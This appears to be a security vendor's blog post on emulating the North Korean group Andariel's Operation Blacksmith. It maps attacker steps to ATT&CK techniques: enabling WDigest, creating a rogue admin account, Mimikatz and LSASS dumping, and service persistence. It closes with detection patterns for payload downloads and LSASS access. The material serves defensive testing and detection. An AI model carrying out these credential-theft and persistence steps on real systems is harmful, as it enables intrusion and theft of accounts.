On December 11, 2023, Cisco Talos reported the discovery of an activity led by Andariel, a North Korean state-sponsored known to be a subgroup of the notorious Lazarus group, which employed three new DLang-based malware families. This activity consists of continued opportunistic targeting of enterprises that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation. During the same, Andariel was observed targeting manufacturing, agricultural, and physical security companies.

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based Remote Access Trojan (RAT) named NineRAT, which employs Telegram as its C2 channel. NineRAT was initially built around May 2022 and was first used as early as March 2023, almost a year later, against a South American agricultural organization. A common tool in this activity was “HazyLoad”, a custom-made proxy tool previously observed targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

Andariel, also known as Onyx Sleet, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa, is a North Korean state-sponsored adversary that has been active since at least 2009. The adversary, a subgroup of the notorious Lazarus group, is suspected to be operating in support of the DPRK’s RGB 3rd Bureau.

Following a significant reorganization of DPRK’s government structure in 2015, Andariel has been focused on collecting intelligence on government and military entities. Its primary targets include defense, aerospace, nuclear, and engineering entities to acquire sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions.

AttackIQ has previously released an attack graph in response to CSA AA24-207A, which emulates the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by Andariel during its latest activities. For further coverage and details, we suggest the reader visit the blog published on July 26, 2024.

In addition, in December 2022, AttackIQ released a content bundle that emulates several activities led by Andariel against multiple entities located in Asia, predominantly in South Korea, through the use of downloaders, backdoors and custom ransomware.

AttackIQ has released a new attack graph that emulates the behaviors exhibited by the North Korean adversary Andariel during Operation Blacksmith to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against an actor with both financial and political motivations.
• Assess their security posture against a threat actor who is not afraid to commit to destruction actions.
• Continuously validate detection and prevention pipelines against another subset of North Korean actors who share successful techniques with other regional threat groups.

Andariel – 2023-12 – Operation Blacksmith

On December 11, 2023, Cisco Talos reported the discovery of an activity led by Andariel, a North Korean state-sponsored known to be a subgroup of the notorious Lazarus group, which employed three new DLang-based malware families. This activity consists of continued opportunistic targeting of enterprises that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation. During the same, Andariel was observed targeting manufacturing, agricultural, and physical security companies.

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based Remote Access Trojan (RAT) named NineRAT, which employs Telegram as its C2 channel. NineRAT was initially built around May 2022 and was first used as early as March 2023, almost a year later, against a South American agricultural organization. A common tool in this activity was “HazyLoad”, a custom-made proxy tool previously observed targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

Discovery – Initial System Reconnaissance

This stage begins immediately after the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMWare Horizon servers. This leads to an initial reconnaissance phase which focuses on obtaining system information such as users, active processes, files and directories and Remote Desktop Protocol (RDP) session reconnection information.

This stage concludes with the query and subsequent modification of a registry key that enables authentication through WDigest.

System Information Discovery (T1082): This scenario executes the native systeminfo command is executed to retrieve all of the Windows system information.

System Owner/User Discovery (T1033): This scenario executes the native whoami command is called to receive details of the running user account.

Account Discovery (T1087): This scenario uses the native net user command to enumerate available accounts on the system.

Process Discovery (T1057): This scenario uses the Window’s built-in tasklist command to discover running processes, and the results are saved to a file in a temporary location.

File and Directory Discovery (T1083): This scenario uses the native dir command to find files of interest and output to a temporary file.

Log Enumeration (T1654): This scenario searches the Windows Event Log for RDP Session Reconnection Information using the wevtutil utility.

System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat to collect active connections and any listening services running on the host.

Query Registry (T1012): This scenario queries the HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ registry key.

Impair Defenses (T1562): This scenario enables WDigest authentication by modifying the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential registry key.

Credential Access & Privilege Escalation – Acquiring Credentials and Privileges

Once the initial reconnaissance has been completed, HazyLoad, a proxy tool used to establish direct access to the infected system, is deployed. Then, an account with the name krtbgt will be created and added to the local Administrators group.

Finally, credentials will be obtained through the hacktool known as Mimikatz and the dumping of the Local Security Authority Subsystem Service (LSASS) process.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Create Account: Local Account (T1136.001): This scenario creates a new account with the name krtbgt using the net user command.

Account Manipulation (T1098): This scenario adds a local user to the local Administrators group using the net localgroup command.

Permission Groups Discovery (T1069): This scenario will enumerate a local permission group using the net localgroup administrators command.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.

OS Credential Dumping: LSASS Memory (T1003.001): This scenario dumps the LSASS memory to disk by creating a minidump of the lsass process. This process is used for enforcing security policy on the system and contains many privileged tokens and accounts that are targeted by threat actors.

Execution – Payload Staging and Deployment

This stage, which begins after the credential dumping phase is completed, focuses on the deployment of the DLang-based Remote Access Trojan (RAT) named NineRAT.

NineRAT deployment consists of three components, the first of which is a dropper binary that contains the other two components embedded in it. The second component, an instrumentor, is used to deploy the third component which is the NineRAT malware.

Finally, persistence is acquired through the creation of a new service named Aarsvc_XXXXXX.

Windows Service (T1543.003): This scenario uses the native sc command line tool to create a new service named Aarsvc_XXXXXX.

Discovery – System Fingerprinting

This stage focuses on the system fingerprinting performed by NineRAT. During this stage, it will seek to obtain detailed system information such as the operating system version and architecture, the username, the security software installed, the network configuration, the connections established, and available remote systems in the domain.

System Information Discovery (T1082): This scenario executes the native ver command to discover the Windows version.

Windows Management Instrumentation (WMI) (T1047): This scenario uses wmic os get osarchitecture to discover the current operating system architecture.

Security Software Discovery (T1518.001): This scenario uses a native Microsoft Windows Windows Management Instrumentation Command (WMIC) to determine which software has been installed as an AntiVirusProduct class.

System Network Configuration Discovery (T1016): This scenario collects the network configuration of the asset using the ipconfig /all command.

Remote System Discovery (T1018): This scenario executes the net group "Domain Computers" /domain command to gather additional hosts available to the infected asset.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

2. OS Credential Dumping: LSASS Memory (T1003.001):

Adversaries may attempt to extract user and credential information from the Local Security Authority Subsystem Service (LSASS) process.

2a. Detection

Search for executions of comsvcs that attempt to access the LSASS process.

Process Name == (comsvcs)
Command Line CONTAINS (‘lsass’)

2b. Mitigation

MITRE ATT&CK recommends the following mitigation recommendations:

3. Windows Service (T1543.003):

Actors can create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.

3a. Detection

The following rules can help identify when that persistence mechanism is being set.

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (‘sc’ AND ‘create’ AND ‘start= “auto”’)

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the Andariel adversary. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.